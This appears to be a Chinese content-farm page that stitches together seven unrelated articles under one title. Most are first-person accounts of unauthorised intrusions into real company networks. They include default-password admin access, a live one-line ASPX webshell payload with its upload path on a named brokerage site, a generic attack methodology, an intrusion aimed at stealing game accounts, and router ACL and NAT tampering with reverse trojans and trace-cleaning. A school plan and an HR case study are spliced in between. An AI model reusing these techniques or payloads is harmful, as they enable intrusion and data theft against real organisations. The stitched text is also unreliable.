检测某知名coffee站点
“一叶轻舟万重山”通过精心收集,向本站投稿了7篇检测某知名coffee站点,以下是小编精心整理后的检测某知名coffee站点,供大家参考借鉴,希望可以帮助到有需要的朋友。
篇1:检测某知名coffee站点
上次过年在diocoffee跟朋友聊了一下午,
回头想想,貌似挺知名的,果断就baidu下域名,xxoo进行ing..
首先namp来了一把,发现只开放了80和3389,应该是在内网里,防火墙拦截了其他端口,
貌似也有点收获,开了put和move,哈哈,一会试试,继续看主站吧
主站测试下:
www.xxx.com/news/news.aspx?classid=2
www.xxx.com/news/news.aspx?classid=1&KeysWord=‘’
手工,工具测试注入,都无果,无奈,继续google下信息先吧..
site:www.xxx.com inurl:asp
个人比较喜欢先看看网站支持哪些脚本,一般会asp/php/aspx/jsp都来google一下,
主站显示是用aspx的,但是搜索asp的时候,眼睛一亮,有个bbs,居然是bbsxp的5.15,
果断点开看,admin、admin,我了个擦,直接进入鸟..果断发个文章,上传附件,直接上传asa,,但是传一个shell,杀一个, ,果断换个乱七八糟的一句话试试,上传,搞定.
菜刀连接发现虽然马是asp的,但是权限也不小,翻到服务器有3 4个站,
其中两个是国内某个著名的咖啡店,翻啊翻,找到web.config,
但是一看, 就是个马棚啊,
翻到好几个站的sa密码,继续探测,换aspx的一句话,连接后,net user、ipconfig各种信息收集的差不多了,添加账户事,不让,好吧,继续用aspx的shell里面的数据库连接功能,net user 添加用户去:
添加成功:
之前nmap探测到开放了80和3389,省得去转发端口了,直接进,但是进去后,就各种恶心了,被趋势的防毒墙啊,网络杀软啊各种杀,所以只能先到这里了,研究研究防毒墙在继续杀入内网,趋势杀工具倒是杀的很猛,但是网站那么多webshell肿么不杀啊!!
篇2:国泰君安某站点getshell
国泰君安某站点 文件上传getshell
这站点采用的是逐浪cms 然后发现这套系统存在上传漏洞
然后顺利拿下此站点 发现存在内网 但是没进行渗透了 危害性应该算比较大吧
漏洞利用代码
利用此代码 上传图片格式的木马 比如1.jpg
<%@ Page Language=“Jscript”%><%eval(Request.Item[“pass”],“unsafe”);%>
上传后木马地址
jxkh.gtja.com/uploadfiles/1.aspx
修复方案:
对上传文件名进行限制
篇3:上海某知名小学发展规划
上海某知名小学发展规划
教育是一项系统工程,学校教育又是教育的主阵地,需要从小学开始就奠定学校教育的扎实基础。因而,贯彻中共中央和上海市委关于制定十五计划建议的要求,进一步落实全国、市和区教育工作会议精神,围绕实现静安精品教育区的目标,开创新世纪全面推进素质教育的新局面,必须切实制订好学校发展规划。
一、制订规划的基础
本校是一所已有七十五年历史的中心小学。在长期的办学实践中,形成了一系列优良的传统和作风,教学风格严谨,学生基础扎实,办学成效显著。学校以较高的教育质量而享誉社会,逾万校友,学有成就,事业有成,报效祖国。
党的改革开放政策,使本校进入到一个新的历史发展时期,尤其是在1988年下半年原国家教委发出基础教育必须实施素质教育的指示后,学校步入了良性发展的轨道。1989年初,本校明确提出了新的历史发展时期的办学目标:让学生打下扎实稳固的基础,使学生具有终身受益的素质。同时,又提出了“奋进、创新”的校风,“敬业、勤业”的教风,“求真、求实”的学风。从1990年起,本校以科研为先导,分阶段有步骤地探索实施素质教育的新路。1990年至1992年,为第一个发展阶段,我们以静安区重点教育科研课题《主题组合活动研究》作为改革的突破口,开设独创的小学综合活动课,达到“拓宽知识、培养能力、发展兴趣特长”的目标,有效地提高了学生多方面素质,此项课题研究成果被评为上海市第四届教育科研成果三等奖。1993年至1995年,为第二个发展阶段,我们构建了全面实施素质教育的整体改革框架,开展了上海市教育科研课题《小学生活动体系研究》的探索,从学科活动、课外活动和闲暇活动三个板块分别作了深入研究,使学校走上了稳步发展的道路,学生素质教育质量有明显提高,该课题研究成果被评为上海市第五届教育科研成果二等奖。至,为第三个发展阶段,我们以学科活动块研究作为重点,以课堂教学策略研究作为抓手,以应用现代教育技术作为突破口,广泛开展了上海市教育科研课题《小学应用现代教育技术研究》的专题研究,取得了突破性进展,使学校发展上了一个新台阶,学生素质教育质量有较显著提高。这项课题研究成果荣获上海市第六届教育科研成果一等奖。自起至,我们又进入学校第四个发展阶段,为了更好地把握实施素质教育的重点,我们开展了上海市教育科研课题《小学创新教育环境研究》的新尝试,初步的研究成果表明:开展创新教育环境研究,创设了有利于学生全面提高素质的人文资源环境和物质资源环境,卓有成效地培养了学生的创新精神和实践能力。
在本校分阶段推进素质教育的过程中,我们同步进行了学校内部管理体制改革,初步实施了聘任制、岗位责任制、结构工资制和奖惩制,进行了人力资源优化工作;采取了多项措施加强师资队伍建设,有效地提高了教师的师德修养,教师的教育理论水平、教学研究水平、教育工作水平和学历水平,达到了新的高度;在局的关心和帮助下,办学条件得到了根本性的改善,北部校舍的新建和南部校舍的改建使学校校舍达到上海市二级标准,完善的教育设备条件使本校处于市的先进水平。
在全面提高素质教育质量的基础上,本校逐步形成了计算机、艺术教育、国际象棋、排球和“三模”制作等办学特色项目,有的项目已跨入全国和市的先进行列。
然而,我们也清醒地认识到:21世纪社会发展对人才培养提出了新的要求,本校在办学的过程中尚有一些不尽如人意的方面,需要我们对办学的行为进行反思。
前些年,本校虽然制订了办学规划,但是对目标分解比较粗略,有的部门和有些教职员工对实施规划缺乏积极性和主动性;并校后新组建的学校领导班子尚处在适应期,干部队伍需要提高多方面素质;并校后教职员工队伍人员大量富余,仍需要通过多种途径进一步做好人力资源优化工作,尤其是师资队伍急需不断提高整体素质;有的办学保障措施还不够完善与落实。
二、发展目标
我们要培养学生成为具有持续发展能力的新时代的小主人,其具体要求为:思想新、基础实、能力强、身心健、特长显。
为此,我们要认真贯彻以德育为核心、以创新精神和实践能力培养为重点的要求,进一步提升实施素质教育的理念;全面推进信息技术教育,开展《以教育信息化促使小学生多元智能发展的实践研究》的课题研究,把握教育改革的一些重点环节,努力提高素质教育质量;充分发挥本校的办学优势,探索与有关方面合作,实施多渠道联合办学;积极落实办学的多方面保障措施,促使素质教育超常规发展。
总之,经过四年的努力,高标准、高质量地奠定义务教育的基础,争取把本校办成在上海市有一定知名度的区一流的中心小学。
三、发展重点
1.构建有时代特点的学校德育工作体系
我们要全面贯彻落实中共中央办公厅和国务院办公厅发出的《关于适应新形势下进一步加强和改进中小学德育工作的意见》的精神,制订相应的本校实施细则,在做好常规德育工作的基础上,我们要重点加强以下各方面工作:
(1)把握中国加入WTO组织的契机,适应上海国际大都市的地位,开展国际化教育,增强学生国际意识。
(2)结合信息技术教育,加强网络道德教育和团队合作精神教育。
(3)全面探索学科德育,研究德育融合到各学科教学中去的规律。
(4)将本校独创的主题组合活动课作为学校德育的特色课程,探索学校德育的特色课程与探究性课程相结合的`新途径。
(5)研究新形势下学校、家庭和社会一体化教育的新特点,发挥其合力作用。
(6)开展信息社会中的少先队活动探索,寓教育于丰富多彩的活动之中。
2.以信息技术促使本校教育发生重大变革
(1)将三年级以上年级的信息科技课纳入必修课。
不断充实和调整教学内容,增加学生动手操作的机会,进一步提高学生应用信息技术的水平和能力。
(2)充分发挥校园计算机网络的作用。
在条件成熟时接入市的宽带网,利用网络更好地为学生的学和教师的教服务。同时,要做好网络安全防范工作。
(3)贯彻上海市二期课改精神,将信息技术整合到各学科教学中去。
要广泛进行演示式、交互式和自主式等多种方法学习,努力提高教学实效。
(4)着力加强学校教育资源库建设。
除教育行政部门和有关教育软件公司提供的教育资源外,发动广大教师一起制作教学软件和积累素材,使教育资源库挥更大作用。
(5)让一部分有条件的学生充分利用网上资源。
在业余时间利用广域网的教育资源和本校网络资源开展自适性学习,学生及家长也可以在家里通过网络与本校网络连接进行开放式学习,了解本校的教育信息、学生的发展情况及与学校双向沟通。
3.以实施上海市二期课改方案为契机,进一步提高学科教学质量。
(1)组织全体教师认真学习领会《上海市面向21世纪中小学新课程方案和各学科教育改革行动纲领》的精神,落实本校的实施方案。
(2)不断完善教学质量监控机制,尤其要强化教研组教学质量监控措施,将教研组建设成为教学研究的基地。
(3)全面推进创新教学活动研究。
汲取学习活动理论、建构主义学习理论、人本主义教育理论、多元智能理论及信息技术理论等多种先进教育理论的长处,指导教学实践,进行案例研究,逐步总结创新教学活动规律,深化教育改革,提高学科教学质量。
(4)从20学年度起在部分年级和学科进行中英文“双语教学”试点,逐步向面上推开。尝试开设中日文活动课。
(5)继续进行IT课程试验,提高学生多方面素质。
(6)将信息科技和音乐等学科逐步发展成为名学科,总结出较高水平的教学经验。
4.深入开展学校课程研究
在本校独创的小学综合活动课―主题组合活动课研究取得成果的基础上,根据21世纪对人才培养的要求,以及上海市教委对有关年级开展主题教育的规定,修改本校制订的《主题组合活动课教学纲要》,充实调整一至五年级相对稳定的三十个主题,编制相应的教学参考资料,改进教学方法和改变教学形式。将主题组合活动课作为学校课程,既发挥德育功能,又作为探究性课程,着力培养学生的创新精神和实践能力。
5.探索学生身心体和谐发展的新路
为切实提高学生的身心素质,我们要在调查分析学生身心素质现状的基础上,改革传统的体育教学模式,将各年级体育项目的要求与学生的身体状况结合起来研究,对学生进行科学健身指导和训练,布置适当的体育回家作业,以有效提高学生的身体素质。
我们要开展对学生生理健康和心理健康指导一体化研究,促使学生身心体和谐发展。
6.艺术教育要有新的突破
我们要持续地进行国家教育部全国现代教育技术实验学校的科研课题《应用现代教育技术改革小学音乐课堂教学模式的研究》的深入研究,构建新的音乐课堂教学模式,制作一批多媒体辅助教学软件,建立音乐教学资源库。要进一步提高电声乐队、舞蹈队、合唱队和小提琴队等艺术团队的水平,继续保持在上海市的领先地位。
美术学科要进一步提高教学水平,积极探索美术教学与指导学生电脑绘画相结合的新路。我们要不断提高儿童画和纸工等美术特色的水平。
我们要处理好提高与普及的关系,更好地推进学校艺术教育,发展学生的兴趣特长。
7.科技教育要有新的发展
我们要广泛开展群众性的科技教育活动,从不同年级的实际出发,进行系列的科技教育,促使学生从小爱科学、学科学、用科学。
我们要持续发展本校“三模”(航模、车模、建模)制作的优势,在原有的基础上要有新的发展,争取达到市的先进水平。
我们要发展OM头脑奥林匹克项目,开发学生的脑功能,更好地培养学生的团队合作精神、创新精神和实践能力。
8.不断发展学校办学特色
我们要在全面提高学生素质教育质量的基础上,重视不断发展办学特色。计算机教育要在普及的基础上,不断提高学生通过网络查找信息、分析信息和应用信息的能力,学会制作网页和电脑小报。国际象棋要逐步扩大试点面,校国际象棋队要在全国和上海市的竞赛中达到先进水平。电声乐队要进一步提高水平,保持在市和区的领先水平。女子排球队要达到市的先进水平。
9.实施多渠道联合办学
(1)发挥本校的办学优势,在业余时间和假期,与九三学社上海市委合作办学。
开办从幼儿教育到成人教育的系列剑桥英语班、少儿科技日语班、网上外语学校。盘活教育资源,为社会发展和学生发展服务,也增加一些学校教育发展经费。
(2)利用本校的办学优势,与国家体育总局棋类运动管理中心国际象棋部(中国国际象棋协会)联合开办国际象棋培训中心。
(3)充分利用本校的办学有利条件,根椐社会的需要,经区教育局
(4)批准与有关单位联合开办其他业余学校。
四、保障措施
1.进一步深化学校管理改革
(1)完善学校内部管理体制改革。
实行“岗位管理、竞争上岗、择优聘用、按岗定酬“的机制,对人力资源进行优化配置,加大分配制度改革的力度。
(2)应用信息技术全面提高学校管理的效率和效益。
(3)强化学校目标管理和层级管理,提高管理实效。
(4)依法治校,修订和完善本校的各项规章制度,做到有章可循。
(5)完善民主管理和监督机制,进一步做好校务公开工作。
(6)重视选拔和培养一批优秀青年干部,形成合理的干部梯队,不断提高干部队伍的素质和管理水平。
2.建设一支高素质的教师队伍
(1)努力提高教师的师德修养水平。
深入开展“今天我们怎样做老师?”的专题讨论,树立一批本校的“为人师表”的先进典型,切实加强精神文明建设,促使教师进一步“敬业、勤业”。
(2)不断提高教师的教育理论水平。
以现代教育思想持续提升教师实施素质教育的理念,将本校的办学发展思路切实转化为教师的具体办学行为,促使教师成为自觉的实践者。
(3)全面提高教师的综合素质。
要通过多种途径不断提高教师的教育理论水平、教学业务水平、教育科研水平、学历水平和工作水平,争取培养出十名左右区级以上(含区级)有一定知名度的教师。
(4)适应上海市二期课改方案的要求,优化组合师资队伍。
从学校的实际出发合理配置师资,教师要一专多能,尤其要重视提高教师应用信息技术水平和英语水平。
(5)重视提高教师的学历水平和层次
大专以上学历的教师要达到教师总数的90%以上。市、区和校级骨干教师要达到教师总数的30%以上。
(6)加强学校教师自培基地建设
继续开展教育理论学习班学习,举行专题业务讲座,进行专业技术培训。
(7)认真落实导师带教、师徒结对和青年教师专题研究等相关措施。
(8)为教师的成长搭设舞台
继续开展每学期一次的“民智杯”教学比武,将教育理论研讨、开课实践和教学评优结合起来,促使教师的教学水平进一步得到提高。 3.继续贯彻以科研为先导的方针
我们要继续进行上海市教育科研课题《小学创新教育环境研究》的深入研究,积极推进《小学中高年级应用题创造性学习研究》、《小学作文素材库的构建与应用》、《小学英语创新教学环境研究》和《四至八岁儿童音乐教育一体化研究》等一批区级教育科研课题研究,完成课题总结,推广研究成果。
从年起酝酿本校全面推进素质教育第五个发展阶段(至)的中心研究课题,初步确定课题为:《以教育信息化促使小学生多元智能发展的实践研究》,争取申报上海市教育科研课题,通过此课题研究,探索以教育信息化促使小学生多元智能发展的主要途径、方法、形式和评价的新路。
我们要积极参与中法合作研究项目《“做中学”研究》的试点,促使学生提高综合素质。
在开展全国、市和区级教育科研课题研究的同时,相应建立一批校级教育研究课题,形成研究课题的系列,争取90%以上教师能直接参与课题研究,促使教育改革持续地向纵深方向发展。
4.改善学校的办学条件
(1)现有的校舍设备条件要加强管理,充分发挥效益。
(2)争取在局的支持下,做好校舍的调整工作。
(3)根据教育教学的需要,在办学经费可能的条件下,增添必要的教育设备。
(4)健全事务处的各项管理制度。
(5)创设优美的校园文化环境。
重点做好南部校区的绿化、美化和净化工作。
(6)多渠道筹措办学经费,不断改善办学条件,逐步提高教职员工待遇。
五、分阶段目标及达成时间节点
1制订办学发展规划阶段(2001年1月-2001年6月)
根椐21世纪教育发展所面临的新形势,贯彻各级领导部门对教育工作的指示精神,围绕创建静安精品教育区的目标,从学校的实际出发,动员全校教职员工一起参与讨论,听取有关领导、专家、家长和学生的意见,制订、修改和完善办学发展规划。
2全面实施办学发展规划阶段(2001年9月-206月)
(1)初步实施办学发展规划阶段(2001年9月-6月)
在全面提升教育理念的基础上,细化本校的培养目标和发展目标,构建各项重点发展工作的框架,落实相应的工作措施,制订检测和评价标准,取得一定的工作成效。
(2)全面落实办学发展规划阶段(209月-年6月)
提炼、完善和总结本校成功的办学经验,形成高水准的办学特色,克服本校工作中的薄弱环节,努力提高办学层次,各项工作取得较显著成绩。
(3)实施办学发展规划总结阶段(2004年9月-2004年12月)
全面总结本校办学发展规划的实施情况,在系统整理办学成果的基础上编辑出版一本专集(专集名另定),开始研究新一轮的办学发展规划。
我们已跨入光辉灿烂的二十一世纪,我们面临的是更大的挑战和更多的机遇,我们深信:在上级党组织和教育行政部门的领导下,在社会有关方面和家长的支持下,紧紧依靠全校师生员工的共同努力,我们的目标一定要实现,我们的目标也一定能够实现。
篇4:检测大型站点的方法
注意:
1.acunetix web vulnerability Scanner 4 简称AC4
2.另外以下一种方式走的通,就不用往下走了
3.个人爱好用Portready,是因为他快速准确,当然你也可以用别的.
4.AC4扫描很耗时间,扫一个网站大约需要3-5个小时,扫整个网段大约需要8个小时左右
方法:
1.X-SCAN扫描目标服务器(一般是没有漏洞,收集信息用吧),看看IIS写权限有漏洞吗,用53溢出或者其他0day和溢出工具试试==>手工查看主站漏洞,先用google+阿d批量扫注入,再手工测试漏洞(例如注入,上传,爆库等等),同时用AC4扫(它在注入方面很细致)==获得 WEBSHELL==提权获得3389 (也许有时候把第3条放在第一条前,更合理一些,直接嗅探方便些),
2.用www.seologs.comip-domains.html将主站列同服务器反解析域名,旁注,==>获得WEBSHELL==>提权获得3389
=======渗透过程(选择比较近的网段,同一个网关才好嗅探啊)==========
3.用IIS写权限测试80,8080端口整个网段,用Portready扫描53主机溢出(或者其他漏洞溢出)==>如果有写权限主机,那么提权,获得系统权限,如果可以溢出,获得系统权限==>tracert目标主机,是否同一个网关==>得到3389,用CAIN嗅探目标主机 80,21,3389等==>获得目标WEBSHELL==>提权获得目标主机3389
4.用Portready扫描同网段3389,80,8080,8000满足3389+80,8000,8080条件的服务器,反解析域名,手工测试漏洞,同时用AC4扫描网站列表==>获得webshell,提权得到系统权限==>tracert目标主机,是否同一个网关==>得到 3389,用CAIN嗅探目标主机80,21,3389等==>获得WEBSHELL==>提权获得3389,
5.用Portready扫描同网段80,8000,8080(主机,(除去上一条扫到的3389主机列表),反解析IP,生成列表,手工测试每个网站, 同时用AC4扫描网站列表(如果网站有漏洞,获得WEBSHELL==>提权获得3389==>tracert目标主机,是否同一个网关== >cain嗅探目标主机==>获得目标主机WEBSHELL==>提权获得目标主机3389),同时用x-scan扫描同网段所有主机 (如果有漏洞,提权得到3389==>tracert目标主机,是否同一个网关==>cain嗅探目标主机==>获得目标主机 WEBSHELL==>提权获得目标主机3389)
6.如果以上均没有漏洞,那就选择网段远一点,或者整个网段,返回第3条。
篇5:渗透某知名游戏代理商内网全程
一、起因
这天刚一上Q,经常说自己是 的“神X月”(他不让我说他网名)就叫我和他一起搞一个游戏官方站,原因是他的一个朋友要他帮忙盗这个游戏的号,神X月没办法,就只好去搞官方拿数据库了。听了他的话我爆汗了1分钟,然后就和他开始了渗透。
二、郁闷的开始
大家都知道,游戏官方站几乎是没有漏洞的。神X月给了我这个游戏的官方网址*e.*****o.com,是个二级域名,网站是asp.net页面,如图1所示。
一级域名是一个游戏代理商,如图2所示。
手工检测了一下,没有明显的注入漏洞,再用了几个工具扫都扫不出注入点,注入这条路断了~~郁闷中.....
忽然,想到了asp.net可能有爆路径的漏洞,不管怎样,获得多一点信息总是好的,于是马上测试了一下,无功而返,然后再用几个比较老的asp.net漏洞检测工具对其进行了检测,照样是无功而返,
继续郁闷.....问了下神X月的进展如何,他说没一点进展,唉,看来是没搞了~~
三、成功初现
在我准备放弃的时候,突然看到上传玩家照片的功能,如图3所示。
感觉这可能就是成功的转折点,但这时候我的信心已经减了一大半,我不抱希望地打开了链接,看来不需要身份验证,直接传了个之前写的超浓缩diy小马,返回上传不成功,把文件名改为ji.gif.asa,同样是上传不成功,看来这个程序并不是从左边来判断文件类型的,我终于放弃了。把上传点丢给神X月,并和他说我不搞了,过了5分钟,他说传了文件上去,但就是不能执行,还有就是服务器不支持asp。
怎么他能传任意文件我就不能呢?问了他之后终于知道是gif文件头欺骗,自己真笨,这都没想到!于是传了asp.net版的diy小马上去,发现的确执行不了,换了一句话和lake2的木马也执行不了,如图4所示。
[1] hack.hack50.com/HTML/0912110443_2.html'>[2] hack.hack50.com/HTML/20080912110443_3.html'>[3] hack.hack50.com/HTML/20080912110443_2.html'>下一页
篇6:渗透某知名公司内部网络网站安全
这个网络很大共有七个网管,现在当前位置是F网、朋友在B网、目标在A网,
朋友给的资料,目前接入internet的两台设备未知(假设未知的设备都是路由器),图2是该公司大体的网络拓扑图。掌握B网所有设备用户名密码(朋友之前嗅探到的)。除A网其它网络可以自由通信, A网内有公司重要信息所以不像其它网,它是不允许任何人访问的,路由不给予转发数据,也就是只进不出的网络,虽然现在的网络是外紧内松,但是想进入目标主 机还是有些难度。怎么跨过设备的限制到达目标呢!您还要向下看。现在首要的目的就是让router3给我们转发数据包。
首先尝试telnet登录路由,拒绝访问不能登录,我想也不能登录,应该是访问控制列表限制了。
现在我们首要目标拿下router3的控制权,为什么目标定位在router3呢!
我们现在知道他的登录密码;
我当前位置可以和B网直接通信;
Router3是A、B网络公用的,应该两个网管都有权限登录;
这一点也是最重要的,只有router3给予数据转发才可以和目标主机通信;
个人认为router3是最佳路线,现在假设一下,如果B网管理员所管理的设备只有他本身所用的IP或TFTP Server(兼DHCP Server)才可以登录设置,那么有如下思路可以完成入侵。一般来说管理员主机一定可以登录这台路由器的,网管主机都不可以登录设备那么谁为维护网络 呢!
1、直接得到B网管理员主机的一个CMDShell来登录设备。
2、得到管理员同网段一台主机的CMDShell,从而利用ARP欺骗来telnet目标路由。
3、得到B网其它网段中可访问外部网络一台主机的CDM Shell,伪装CDM Shell主机IP地址,必要情况伪装IP+MAC地址来欺骗路由器,(机会高达到50%)。
经过分析拿B网的DHCP服务器(172.16.101.25)开始,选择突破点也是很重要的,DHCP服务器为了提供这个网段的服务他是暴露在相对 外部的,而且不在VLAN的管辖中,还和网管在同一交换机下,而且听朋友说他们公司PC几乎不打补丁,还有很多员工不知补丁为何物,这也给入侵带来及大 的方便。利用服务器的WEB木马上传一些流行的溢出程序,直接拿个溢出程序溢出他的DHCP服务器,(最后才知道的溢出程序对这个主机都有 用)成功得到一个System权限的CMDShell。
革命尚未成功,同志们还须努力啊!“下载”我们肉鸡一个反弹的木马,我们的肉鸡是不能主动连接DHCP服务的,好像有点费话。现在这个主机就是我们在 内网的一个接入点,放弃我们刚才控制的那个WEB主机,利用反弹木马开的个CMD。telnet一下路由,%connection closed by remote host!还是连接失败,不能登录路由器,看样只有172.16.101.15这台主机(管理员IP)可以登录了,我们看一下登录他的交换机OK不(一般 工作组交换机权限设置不会那么BT)。
telnet 172.16.101.253 //交换机管理地址
Password:
center>enable
Password:
成功登录,show mac-access、show cdp neighbors、show arp一些命令判断管理员对应的结口,管理员的IP对应的是FastEthernet 7/1,这个时候要用到IP地址的欺骗,在此感谢EST长的最难看的哥哥。
#interface FastEthernet 7/1
#shutdown
当然,这要等网管离开的时候才可以,这就要内外结合了。这个时候172.16.101.15这台主机在网络上以消失了,我们试一下路由是否允许网管的主机登录,把自己的IP改成172.16.101.15,输入:
netsh >interface ip
netsh interface ip >dump看一下接口配置信息
netsh interface ip >set address name = ″本地连接″ source = static addr = 172.16.101.15 mask = 255.255.255.0
这时候当前主机地址改为172.16.101.15,现在这个主机会和我断掉,但只是一小会,我们的反弹木马一会就能上线。一般重新变改IP地址要发 个ARP包告诉网络其它主机,大概意思是我的IP是172.16.101.15,MAC地址是00-00-00-00-12-34,以后有发往 172.16.101.15地址的数据包都有我来响应。交换机刷新地址表后这台主机伪装成功。在telnet登录路由器,如图2
show running-config看一下配置信息,把路由配置信息COPY到记事本在分析,找到如下配置信息。
access-list 99 172.16.8.88 0.0.0.0 //A网管理员地址
access-list 99 172.16.101.15 0.0.0.0
访问列表99限制只有以上两个IP可以登录路由,看来是这个家伙在作怪,
删除99访问列表,在添加99访问列表:
#access-list 99 172.16.68.88 0.0.0.0
#access-list 99 172.16.101.15 0.0.0.255 //改成172.16.101.0/24网段都可以登录
#line vty 0 4
#access-class 99 in
退出路由系统,把自己IP改回来,把交换机设置也改回来以免网管回来被发现。
center(config)#interface FastEthernet 7/1
center(config-if)#no shutdown
简单的清理一下留下的痕迹,退出他们的网络来分析一下网管是怎么配置的路由,在路由配置信息中有几条重要信息。
ip nat pool NO.1027 10.255.200.1 10.255.200.105 netmask 255.255.255.0
ip nat inside source list 10 pool NO.1027 overload
access-list 10 permit 172.16.7.0 0.0.0.255
access-list 10 permit 172.16.8.0 0.0.0.255
……
router eigrp 10
真是不敢恭维网管的技术,一条访问列表可以搞定的事,非要分成N个访问列表来描述。到这时才明白为什么朋友不能访问目标主机,因为A网边界路由器为其 作NAT的地址转换,将B类地址转换成A类地址,并且有访问列表限制。现在要使当前主机和目标主机在“堡垒”中建立一条专用的“线路”。我这对路由的配 置不是很熟悉,也不敢太多的尝试,以免被网管发现,但是我们可以“重新”配置一下他的eigrp协议,使内部的地址完全暴露在外边,但此办法太容易让网 管发现,但是当时没想出别的办法来。
#clear ip nat translation *
#no ip nat inside source list 10 pool NO.1027 overload
#no …… //去掉他的访问列表及NAT配置信息
#router eigrp 10
(config-router)#network 172.16.2.0 0.0.0.255
(config-router)#network 172.16.3.0 0.0.0.255
(config-router)#network …… //把所有的网段加进去
#reload 10 //10分钟后设备自动重启
现在路由器就可以为我们转发数据包了,并且在10分钟自动重启使更改的的配置失效,我们现在只差一步就大功告成了,现在须要在我控制的那台主机到目标主机创建一条干线使我们的数据包可以直接到达目标主机。
show cdp neighbors得到如下信息:
Device ID Local Intrfce Holdtme Capability Platform. Port ID
Router3 Fas0/12 176 R 2621 4
在交换机中添加VLAN 13,(目标主机的VLAN号),进入Fas0/12端口, “switchport trunk all vlan add 13 ”,在trunk中添加VLAN13,使这条线路可以通过VLAN13的数据,没有必要改变自己的VLAN号,路由器现在没有访问列表来控制我们的数据 流。这个时候我们ping 172.16.8.120目标主机物理IP地址数据包可以到达了。
这次入侵也接近尾声了,和以前一样还是溢出后安装一个反弹木马,使他可以主动连接我的肉鸡,当然这要在10分钟内搞定,否则要重新进路由改变他重启的 时间,备份他硬盘上的数据,备份肉鸡上的数据,最后就是清理一下入侵的痕迹。这次入侵大约10天才完成,因为要等到特定的时间才可以改变他的网络设备配 置,比如改变路由器的访问列表进一定要等到下班时间,大多用户不使用网络时、而目标主机还在使用网络时、网管还没有关闭设备时,也就是要和网管打个时间 差。
本文经过N次的筛选终于从万字的文章精减出此文,可读性、实用性一定会有不同程度上的衰减,本次入侵没有什么新的技术,主要说怎样绕过内部网络设备的限制,只不过是一些经验的叠加,针对网络设备入侵这也算很初级的。
当时少写了个步骤,少了是不会成功的,仔细看的朋友一定能看出来。
转自无才牛。。。
篇7:某知名保险公司人才测评应用案例
A保险公司是中国北方第一家合资寿险公司,拥有设施先进的办公场所,实力雄厚的后援支持,高素质的管理人员和代理人队伍,现代化的科学培训体系,以及专业化的经营服务理念。并倡导以客为尊、以人为本的核心价值观。
目前保险从业公司主要通过代理人出售保单,代理人和公司之间是合作而非雇佣关系。公司需要对新招聘的代理人进行岗前培训,而且平均每年要有不少于60小时的定期培训,此外公司会为代理人配置固定的办公场所,并有后勤行政人员进行专门管理,这些需要一笔非常可观的费用开支。随着个人代理人规模的不断扩大加之行业内人员流动率高达45%,所以在公司所有的招募工作中,招聘保险代理人是最繁重、折旧最快、成本最高的任务。
如何才能招聘到合适的保险代理人呢?创业说明会是保险行业招聘代理人中最常用的一种手段,是通过现场的讲解、说明吸引更多的优秀人才,创业说明会每个月至少召开一次,一次规模在几十到上百人不等,这样招聘人员的可选范围非常大,但是人员的水平参差不齐,数量上的庞大,也为公司的人力资源部门工作也带来了巨大的挑战。
A保险公司的人力资源部门调研发现,基于岗位胜任力的素质测评系统可以很好的解决这个问题,很多专业的心理测评工具供应商都会提供此项服务,帮助用人单位分析出哪些素质是需要在测评当中考察的,从而为招聘单位节省大量的人力成本和时间成本。
基于这种现状,该保险公司通过多方对比考察,决定采用北森弈衡招聘选拔系统进行招聘。原因在于弈衡招聘选拔系统专门针对中、低层人员的招聘而开发,根据职位要求的不同,细分了包括销售、财务等在内的十二大职类测试模板,系统根据每个职类的具体要求给出职位标准,可以通过比对应聘者和特定职位标准,给出应聘者与职位的精确匹配度,特别适用于大量招聘。
由于保险行业具有一定行业特殊性,所以该保险公司提出新的需求:希望能够由北森专家辅助建立自己公司的代理人招聘标准,于是北森公司组织研发中心的项目组人员,分别对该保险公司高绩效员工和绩效一般的员工各5名进行深入的访谈,经过分析从访谈事件中提取出对于“代理人”这个职位最核心的胜任能力模型,同时也确立了在“代理人”这个职位上,影响其绩效的十三项素质特征,包括:演绎推理、沟通技巧、乐群性、人际交往技巧、社会适应能力、进取心、责任心、成功愿望、挫折承受能力、创新意识、灵活性、目标意识和计划性。当确立了需要考察的素质后,由该公司总部和北森测评顾问组织绩优员工共5名参加测评,最后通过分析本公司员工测试的结果形成该保险公司个性化的用人标准。
用人标准形成后,该公司开始将人才测评做为所有应聘者入职前必须的一个环节。应聘者做完测评后,系统会自动和该保险公司个性化生成的标准对比,得出匹配系数。匹配系数越高,就越适合代理人职位,HR会根据情况电话邀约匹配度较高的应聘者进行下一轮面试,同时测评的结果会记入个人资料存档。
“弈衡招聘选拔系统还有一个绝对的优势就是:弈衡报告不仅告诉我每个人在某个维度上的得分和差距,同时在某个单项维度上不符合我公司要求时,报告还会给我提供相应的面试问题,在面试过程中,根据招聘职级不同,面试官也不同,比如:招聘普通代理人,主要由区域经理来面试,如招聘经理职级,就需要由分公司总经理或是副总来亲自面试、把关,但无论面试官是谁,是否有心理学背景,弈衡招聘选拔系统都能够提供非常有意义的参考价值和方向。”负责代理人招聘的王总如是说。
该保险公司在总部使用弈衡的基础上,开始自己下属的十几个分公司推广这套招聘选拔系统,给北京、南京、天津、杭州等分公司都设立了独立的弈衡招聘选拔系统的子管理平台。子平台间相互独立,可以自主进行各项招聘,同时总部的管理后台可以同时监控各子公司的招聘情况,极大地方便了公司管理。北森专家辅助总公司建立的用人标准也在各个分公司在统一应用,进一步实现了人员标准化管理。
当前,该公司正在以每年增开几家分公司的速度快速发展,对于高素质人员的需求也愈发剧烈,代理人招聘的王总表示:“引入弈衡招聘选拔系统后,整个招聘工作的效率得到了极大的提升,在07年的社会招聘工作中我们将继续使用弈衡招聘选拔系统的职位模板来辅助招聘工作。”为此,总公司编制了内部推动手册,包含弈衡的操作流程、信息反馈表等。各分公司在经过一段时间的使用后,都对弈衡系统的实用性和准确性给出了良好的反馈,为以后的招聘工作做好了准备。
[某知名保险公司人才测评应用案例]
【检测某知名coffee站点】相关文章:
2.知名的近义词
10.知名的英语广告标语
文档为doc格式
